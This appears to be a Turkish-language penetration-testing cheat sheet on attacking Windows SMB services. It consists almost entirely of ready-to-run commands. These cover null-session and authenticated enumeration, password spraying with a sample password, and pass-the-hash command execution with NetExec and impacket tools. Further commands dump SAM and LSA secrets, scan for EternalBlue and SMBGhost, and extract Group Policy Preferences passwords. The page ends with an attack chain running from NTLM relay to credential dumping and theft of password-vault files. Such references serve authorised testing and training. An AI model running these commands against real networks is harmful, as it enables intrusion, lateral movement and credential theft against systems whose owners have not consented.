SMB Enumeration & Saldırıları
SMB difficulty: orta
SMB (445/tcp, eski 139), Windows ağlarında dosya paylaşımı, named pipe ve uzaktan yönetim için merkezî servistir. Enumeration’dan relay hedefine, PtH ile komut çalıştırmaya kadar iç ağın omurgasıdır.
Ön koşullar
Section titled “Ön koşullar”- Hedef IP / CIDR- Opsiyonel: domain user:pass veya NTLM hash- Araçlar: nxc (NetExec), smbclient, smbmap, enum4linux-ng, impacket, nmapKimliksiz enumeration
Section titled “Kimliksiz enumeration”nmap -p445 --script smb-os-discovery,smb-protocols,smb-security-mode 10.10.10.5nxc smb 10.10.10.0/24nxc smb 10.10.10.5smbclient -L //10.10.10.5 -Nsmbmap -H 10.10.10.5 -u '' -p ''smbmap -H 10.10.10.5 -u 'guest' -p ''nxc smb 10.10.10.5 -u '' -p '' --sharesnxc smb 10.10.10.5 -u 'a' -p '' --shares # guest varyantıenum4linux-ng -A 10.10.10.5nbtscan 10.10.10.0/24nmblookup -A 10.10.10.5Signing durumu relay için kritik:
nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txtKimlikli enumeration
Section titled “Kimlikli enumeration”nxc smb 10.10.10.5 -u user -p 'Pass123!' --sharesnxc smb 10.10.10.5 -u user -p 'Pass123!' --usersnxc smb 10.10.10.5 -u user -p 'Pass123!' --groupsnxc smb 10.10.10.5 -u user -p 'Pass123!' --pass-polnxc smb 10.10.10.5 -u user -p 'Pass123!' --rid-brutenxc smb 10.10.10.5 -u user -p 'Pass123!' --sessionsnxc smb 10.10.10.5 -u user -p 'Pass123!' --loggedon-usersnxc smb 10.10.10.5 -u user -p 'Pass123!' --disksnxc smb 10.10.10.0/24 -u user -p 'Pass123!' --sharessmbclient //10.10.10.5/Share -U 'hedef.local/user%Pass123!'smbmap -H 10.10.10.5 -u user -p 'Pass123!' -rsmbmap -H 10.10.10.5 -u user -p 'Pass123!' -R Share --downloadnxc smb 10.10.10.5 -u user -p pass --spider SHARE --pattern txt,xlsx,config,kdbxHash ile:
nxc smb 10.10.10.5 -u user -H aad3b435b51404eeaad3b435b51404ee:ntlmhash --sharesYaygın saldırılar
Section titled “Yaygın saldırılar”-
SMB signing kapalı host bul — nxc smb
<range>–gen-relay-list out.txt ; bunlar NTLM relay hedefidir. -
Parola sprey — kilitlenme politikasını öğren, sonra tek parola / çok kullanıcı:
Terminal window nxc smb 10.10.10.5 -u user -p pass --pass-polTerminal window nxc smb 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!' --continue-on-success -
Pass-the-Hash / komut çalıştırma — local admin veya eşdeğeri hash/parola ile:
Terminal window nxc smb 10.10.10.5 -u admin -H <NTLM> -x "whoami /all"Terminal window nxc smb 10.10.10.5 -u admin -H <NTLM> --samTerminal window nxc smb 10.10.10.5 -u admin -H <NTLM> --lsaTerminal window psexec.py hedef/admin@10.10.10.5 -hashes :NTLMTerminal window wmiexec.py hedef/admin@10.10.10.5 -hashes :NTLMTerminal window smbexec.py hedef/admin@10.10.10.5 -hashes :NTLMTerminal window atexec.py hedef/admin@10.10.10.5 "whoami" -
Zafiyet taraması — MS17-010 (EternalBlue), SMBGhost (CVE-2020-0796) vb.:
Terminal window nmap -p445 --script smb-vuln-ms17-010 10.10.10.5Terminal window nxc smb 10.10.10.0/24 -M ms17-010Terminal window nxc smb 10.10.10.0/24 -M smbghost
Share içeriği ve GPP
Section titled “Share içeriği ve GPP”smbclient //dc01/SYSVOL -U 'user%pass'nxc smb dc01 -u user -p pass -M gpp_passwordnxc smb dc01 -u user -p pass -M gpp_autologinKomut üreteci
Section titled “Komut üreteci”SMB · NetExec
embedded toolGenerated command
nxc smb 10.10.10.0/24 -u user -p Pass123 --shares --usersSMB · NetExec
Section titled “SMB · NetExec”Saldırı zinciri
Section titled “Saldırı zinciri”nxc smb CIDR → signing off + null shares → Responder/ntlmrelayx → admin on WORKSTATION → --sam / lsassy → local + domain cached → PtH → file server → bak.kdbx / scripts